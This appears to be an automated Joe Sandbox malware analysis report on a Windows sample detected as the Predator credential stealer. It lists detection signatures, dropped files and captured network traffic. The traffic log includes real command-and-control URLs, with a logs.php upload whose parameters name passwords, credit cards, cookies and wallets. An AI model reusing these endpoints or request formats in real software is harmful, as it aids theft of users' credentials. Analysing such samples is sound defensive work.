Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5VXh2VBmA0

Overview

General Information

Sample Name:5VXh2VBmA0 (renamed file extension from none to exe)
Analysis ID:790106
MD5:7a483865f3f1999ab24ed75f710649ad
SHA1:b149c60bbc7f1781e76079210da29a55d0b137a3
SHA256:536ac35ca8f6e6ddf85737ad4cabd5631542613ffec3c9b03947aaa2cdc0dcaf
Infos:

Detection

Predator
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Predator
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
May check the online IP address of the machine
Yara detected Generic Downloader
Machine Learning detection for dropped file
Moves itself to temp directory
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 5VXh2VBmA0.exe (PID: 6016 cmdline: C:\Users\user\Desktop\5VXh2VBmA0.exe MD5: 7A483865F3F1999AB24ED75F710649AD)
    • Zip.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\Zip.exe" MD5: AF07E88EC22CC90CEBFDA29517F101B9)
  • update_232309.exe (PID: 2108 cmdline: "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start MD5: 7A483865F3F1999AB24ED75F710649AD)
  • update_232309.exe (PID: 4552 cmdline: "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start MD5: 7A483865F3F1999AB24ED75F710649AD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5VXh2VBmA0.exeJoeSecurity_PredatorYara detected PredatorJoe Security
    5VXh2VBmA0.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      5VXh2VBmA0.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        5VXh2VBmA0.exeINDICATOR_SUSPICIOUS_EXE_References_VPNDetects executables referencing many VPN software clients. Observed in infosteslersditekSHen
        • 0x7d546:$s1: \Vpn\NordVPN
        • 0x80cb0:$s2: \VPN\OpenVPN
        • 0x80d1e:$s3: \VPN\ProtonVPN
        5VXh2VBmA0.exeWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0x651cd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\Zip.exeWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0xf1ed:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
        00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PredatorYara detected PredatorJoe Security
          00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
            • 0x64dcd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
            00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              10.0.Zip.exe.176e4530000.0.unpackWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
              • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
              0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpackWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
              • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
              0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpackJoeSecurity_PredatorYara detected PredatorJoe Security
                0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 22 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.392.249.45.11349708802022818 01/23/23-21:25:29.484357
                    SID:2022818
                    Source Port:49708
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.392.249.45.11349707802022818 01/23/23-21:25:23.289815
                    SID:2022818
                    Source Port:49707
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.392.249.45.11349712802022818 01/23/23-21:25:39.311255
                    SID:2022818
                    Source Port:49712
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.392.249.45.11349715802022818 01/23/23-21:25:47.864338
                    SID:2022818
                    Source Port:49715
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.392.249.45.11349718802022818 01/23/23-21:25:59.271301
                    SID:2022818
                    Source Port:49718
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 5VXh2VBmA0.exeReversingLabs: Detection: 80%
                    Source: 5VXh2VBmA0.exeVirustotal: Detection: 60%Perma Link
                    Source: 5VXh2VBmA0.exeAvira: detected
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeAvira: detection malicious, Label: TR/Redcap.vxffz
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeReversingLabs: Detection: 76%
                    Source: 5VXh2VBmA0.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeJoe Sandbox ML: detected
                    Source: 0.0.5VXh2VBmA0.exe.760000.0.unpackAvira: Label: TR/Redcap.vxffz
                    Source: 5VXh2VBmA0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5VXh2VBmA0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Windows.Forms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9A6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9B9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: rms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb source: 5VXh2VBmA0.exe, Zip.exe.0.dr
                    Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
                    Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb source: 5VXh2VBmA0.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeCode function: 4x nop then dec eax0_2_00007FFBAD3AA1A9
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 4x nop then dec eax10_2_00007FFBAD3A9C5F
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 4x nop then dec eax11_2_00007FFBAD3B6EEE
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeCode function: 4x nop then dec eax12_2_00007FFBAD376F2E

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49707 -> 92.249.45.113:80
                    Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49708 -> 92.249.45.113:80
                    Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49712 -> 92.249.45.113:80
                    Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49715 -> 92.249.45.113:80
                    Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.3:49718 -> 92.249.45.113:80
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeDNS query: name: ip-api.com
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeDNS query: name: ip-api.com
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49dHost: panel.cheater-zone.comContent-Length: 791547Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: global trafficHTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1Host: panel.cheater-zone.com
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: update_232309.exe, 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.drString found in binary or memory: http://expression/newtonsoft.json.dll
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000003145000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61F0000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: 5VXh2VBmA0.exe, Zip.exe.0.drString found in binary or memory: http://ip-api.com/json/
                    Source: Zip.exe, 0000000A.00000002.375551818.00000176E61FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com8
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.comx
                    Source: Newtonsoft.Json.dll.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: 5VXh2VBmA0.exeString found in binary or memory: http://panel.cheater-zone.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88D
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88D
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://panel.cheater-zone.com8
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://panel.cheater-zone.comx
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E6121000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317F000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
